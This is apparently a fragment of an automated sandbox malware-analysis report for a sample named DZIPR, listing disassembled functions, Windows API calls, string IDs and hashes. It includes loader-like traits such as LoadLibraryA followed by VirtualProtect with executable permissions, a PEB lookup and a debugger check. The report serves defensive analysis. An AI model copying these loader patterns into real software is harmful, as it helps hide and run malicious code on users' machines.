                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                                          • String ID:
                                          • API String ID: 2524245154-3916222277
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C518E78
                                          • PathFindExtensionW.SHLWAPI(?), ref: 6C518E8E
                                            • Part of subcall function 6C518BDF: __EH_prolog3_GS.LIBCMT ref: 6C518BE9
                                            • Part of subcall function 6C518BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C518EB7,?,?), ref: 6C518C19
                                            • Part of subcall function 6C518BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C518C2D
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C518C69
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C518C77
                                            • Part of subcall function 6C518BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C518C94
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C518CBF
                                            • Part of subcall function 6C518BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C518CC8
                                            • Part of subcall function 6C518BDF: GetModuleFileNameW.KERNEL32(6C510000,?,00000105), ref: 6C518D7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                          • String ID: %s%s.dll
                                          • API String ID: 1311856149-1649984862
                                          APIs
                                            • Part of subcall function 6C525017: __getptd.LIBCMT ref: 6C52501D
                                            • Part of subcall function 6C525017: __getptd.LIBCMT ref: 6C52502D
                                          • __getptd.LIBCMT ref: 6C52C54B
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C52C559
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3
                                          • String ID: PTl$xPTl
                                          • API String ID: 431132790-4124573034
                                          APIs
                                          • _memset.LIBCMT ref: 6C517318
                                          • PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6C517540,00000000,?), ref: 6C51732D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: PathRootStrip_memset
                                          • String ID: @uQl
                                          • API String ID: 2213896960-265186556

                                          Control-flow Graph

                                          • Calls shown in graph: LoadLibraryA, VirtualProtect
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FAC6602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FAC663B
                                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FAC6654
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$LibraryLoad
                                          • String ID:
                                          • API String ID: 895956442-0

                                          Control-flow Graph

                                          • Calls shown in graph: GetPEB, GlobalAlloc
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_memset
                                          • String ID:
                                          • API String ID: 2997193564-0

                                          Control-flow Graph

                                          • Calls shown in graph: GlobalAlloc
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FAC5ECA
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: 5619a3eb60206dbba85a8ccaba38dc6d104fb31c5a60a225cf418c108d438a68
                                          • Instruction ID: 48d0b7becb0ce3cad61d328b5d7511903bedd43bb5b5344c87777f8ad6449d19
                                          • Opcode Fuzzy Hash: 5619a3eb60206dbba85a8ccaba38dc6d104fb31c5a60a225cf418c108d438a68
                                          • Instruction Fuzzy Hash: C2A17E706087068FC708CF2DC59063AB7E2BF89304F18856EE89697356D774F996CB92

                                          Control-flow Graph

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6FAF32EC), ref: 6FACBC61
                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6FAF32D0,6FAF32D0,?,6FACC0A4,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBCB7
                                          • GlobalHandle.KERNEL32(00CCC838), ref: 6FACBCC0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FACBCCA
                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6FACBCE3
                                          • GlobalHandle.KERNEL32(00CCC838), ref: 6FACBCF5
                                          • GlobalLock.KERNEL32(00000000), ref: 6FACBCFC
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBD05
                                          • GlobalLock.KERNEL32(00000000), ref: 6FACBD11
                                          • _memset.LIBCMT ref: 6FACBD2B
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBD59
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                          • String ID:
                                          • API String ID: 496899490-0
                                          • Opcode ID: 56f7a3c0ea6f5ab774657c34ba9b7c6cd7b3e0546934bcdd1aec7718a8485a61
                                          • Instruction ID: 8d8d44e3cf842c6d596a73e3932a5d1cf5f7b3a300800734ce79a93c7ff8aa8c
                                          • Opcode Fuzzy Hash: 56f7a3c0ea6f5ab774657c34ba9b7c6cd7b3e0546934bcdd1aec7718a8485a61
                                          • Instruction Fuzzy Hash: 4231E371A04B04AFDB21CF78C889A9ABBF9FF45350B048A2DE656D7240DB35F881CB50

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FAC6602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FAC663B
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoadProtectVirtual
                                          • String ID:
                                          • API String ID: 3279857687-0
                                          • Opcode ID: 9a1febfd6ea76f4081b3002436ed59b0327407ef718da4da156a27041151096d
                                          • Instruction ID: 73bfb78963a9750de7f3e90f7d289b6123713927c3ab737f3bde1a09aee95953
                                          • Opcode Fuzzy Hash: 9a1febfd6ea76f4081b3002436ed59b0327407ef718da4da156a27041151096d
                                          • Instruction Fuzzy Hash: DA51F5705083558FC715CF29C9C062AFBE5BFCA308F19895DE88957316C634F956CB92

                                          Control-flow Graph

                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FAEC168), ref: 6FAC6300
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: adfd71b60288a64a59ee0e6c064eadf589119a9c256312ec088764e798b61536
                                          • Instruction ID: 756358e04eb4e5302a8fb0437cdd6da6286153e45ac5bf89f65af874932792fd
                                          • Opcode Fuzzy Hash: adfd71b60288a64a59ee0e6c064eadf589119a9c256312ec088764e798b61536
                                          • Instruction Fuzzy Hash: BF41C2756087058FC708CF19C88067AB7E2FFC6324F09CA6DE88997315D635F8968B82

                                          Control-flow Graph

                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FAEC168), ref: 6FAC6300
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: b4f8e12a3597656d376c3a6f1ce11c0e1411473cae7c128879a73119b5060542
                                          • Instruction ID: 996b865f9dc4bd8dbb326a6a4627df08dc231a9244f65e1c2a8b8c48527f689f
                                          • Opcode Fuzzy Hash: b4f8e12a3597656d376c3a6f1ce11c0e1411473cae7c128879a73119b5060542
                                          • Instruction Fuzzy Hash: ED31BF71A087058FC719CF19C88067AB7E2BFC6314F09C96DE89957316D634F896CB82

                                          Control-flow Graph

                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FACC057
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3$Exception@8Throw
                                          • String ID:
                                          • API String ID: 2489616738-0
                                          • Opcode ID: 50c96c825f12d8adda17828d79b8e503235327abd4e98051895eddd9583ba2b6
                                          • Instruction ID: 3c61af2c77438bb58d0f6d7cc15fad224105b3475ff481dbf262e9ac7fdc8b57
                                          • Opcode Fuzzy Hash: 50c96c825f12d8adda17828d79b8e503235327abd4e98051895eddd9583ba2b6
                                          • Instruction Fuzzy Hash: ED015A34601B428BDB19AF68851126D36A2AF513A4F158529E891CF2D0DF39D9C28B12

                                          Control-flow Graph

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FAC60F6
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 0b61af444aa15cad42467f0e943137376c08e339d91ec6979204ae6abd83bb0b
                                          • Instruction ID: bfacf9a97a2ece001b6d87b7480bddc2d460aaaf3fc36822d6ffb2a1e0d8254f
                                          • Opcode Fuzzy Hash: 0b61af444aa15cad42467f0e943137376c08e339d91ec6979204ae6abd83bb0b
                                          • Instruction Fuzzy Hash: B101E8B49097019FC718CF0AC89091AFBE6FFC9314F16856DA8489B316C630E851CF85

                                          Control-flow Graph

                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FAD4776,00000001,?,?,?,6FAD48EF,?,?,?,6FAEE848,0000000C,6FAD49AA), ref: 6FADA709
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: 6f58cc66efddac0bc666d29b3e27ee937a7ffb46c92fdf83c24c2ec59407d681
                                          • Instruction ID: de9ca8bc8c85986a30e03f2da93dc75865fb9d54c5eb2d0003c8ca3858e4defd
                                          • Opcode Fuzzy Hash: 6f58cc66efddac0bc666d29b3e27ee937a7ffb46c92fdf83c24c2ec59407d681
                                          • Instruction Fuzzy Hash: 29D05E32A587449EDB009E76AC087663BED97857A6F14C835F80DCB180F574D5A19A04
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FAC7498
                                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FAC76D5,?,00000000,?,00000000,00000104,00000000,?,6FAEBEF4,00000000), ref: 6FAC74D6
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FAC7546
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FAC756D
                                          • CharUpperW.USER32(00000000), ref: 6FAC75A0
                                          • FindFirstFileW.KERNEL32(?,?), ref: 6FAC75BC
                                          • FindClose.KERNEL32(00000000), ref: 6FAC75C8
                                          • lstrlenW.KERNEL32(?), ref: 6FAC75E6
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                          • String ID:
                                          • API String ID: 624941980-0
                                          • Opcode ID: 3cc44be4aee977a8e1e7cdbe9f02cbade29c0293f40a3de7da4ab52774dc8b43
                                          • Instruction ID: f751f36e03f3100d25fdfc83d3db5a7d467f29d617ef74ae2816a8ba34e89340
                                          • Opcode Fuzzy Hash: 3cc44be4aee977a8e1e7cdbe9f02cbade29c0293f40a3de7da4ab52774dc8b43
                                          • Instruction Fuzzy Hash: 3D41B2709087199BDF14AF74CE9CBAE7B7CAF01314F0442D9E829A1190DB399AD5CF12
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: _memset
                                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                          • API String ID: 2102423945-1093365818
                                          • Opcode ID: 0e651dc843ef306eb2629499ed7067551a2c1efcb3e7dc23a187473dac80fd48
                                          • Instruction ID: b845dd972536aca32d57dfc17dcf6e9db5298345b20f14b9652d099f2d479c44
                                          • Opcode Fuzzy Hash: 0e651dc843ef306eb2629499ed7067551a2c1efcb3e7dc23a187473dac80fd48
                                          • Instruction Fuzzy Hash: 21910171D0030DAEEB51CFA4C585BDEBBF8AF48348F149166FD18E6184E7B89685C7A0
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 6FAD7C6C
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FAD7C81
                                          • UnhandledExceptionFilter.KERNEL32(6FAEA4B8), ref: 6FAD7C8C
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FAD7CA8
                                          • TerminateProcess.KERNEL32(00000000), ref: 6FAD7CAF
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: eb11f81e53a338767bf00455fa5afad2c4a0ab5a6f1bcfd226865bcba0ab34d2
                                          • Instruction ID: 0deef2a0632589c6ae22d976b68dabcbde89d13312c34b33abc68e90803e4e5b
                                          • Opcode Fuzzy Hash: eb11f81e53a338767bf00455fa5afad2c4a0ab5a6f1bcfd226865bcba0ab34d2
                                          • Instruction Fuzzy Hash: D521CFB4807B04AFDB40DF6DE9496493BB4BB0A325F51C21AE408DF390E7B4A5A29B45
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FAC89FC
                                          • __snwprintf_s.LIBCMT ref: 6FAC8A2E
                                          • LoadLibraryW.KERNEL32(?), ref: 6FAC8A69
                                            • Part of subcall function 6FAD5348: __getptd_noexit.LIBCMT ref: 6FAD5348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                          • String ID: LOC
                                          • API String ID: 3175857669-519433814
                                          APIs
                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 6FACE61F
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 6FACE634
                                          Similarity
                                          • API ID: Window$CallNtdllProcProc_
                                          • String ID:
                                          • API String ID: 1646280189-0
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FAC8BE9
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FAC8EB7,?,?), ref: 6FAC8C19
                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FAC8C2D
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C69
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C77
                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FAC8C94
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8CBF
                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FAC8CC8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FAC8CE1
                                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FAC8CFE
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8D31
                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FAC8D3A
                                          • GetModuleFileNameW.KERNEL32(6FAC0000,?,00000105), ref: 6FAC8D7F
                                          • _memset.LIBCMT ref: 6FAC8D9F
                                          Strings
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                          • API String ID: 3537336938-2299501126
                                          APIs
                                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FACDE36,?,?,?,?,?,?,?,6FACFCC6,00000000,00000002,00000028), ref: 6FACDCF9
                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FACDD15
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FACDD2A
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FACDD3B
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FACDD4C
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FACDD5D
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FACDD6E
                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FACDD8E
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                          • API String ID: 667068680-2451437823
                                          APIs
                                            • Part of subcall function 6FAD2C57: GetWindowLongW.USER32(?,000000F0), ref: 6FAD2C62
                                          • GetParent.USER32(?), ref: 6FACFC05
                                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FACFC28
                                          • GetWindowRect.USER32(?,?), ref: 6FACFC42
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FACFC58
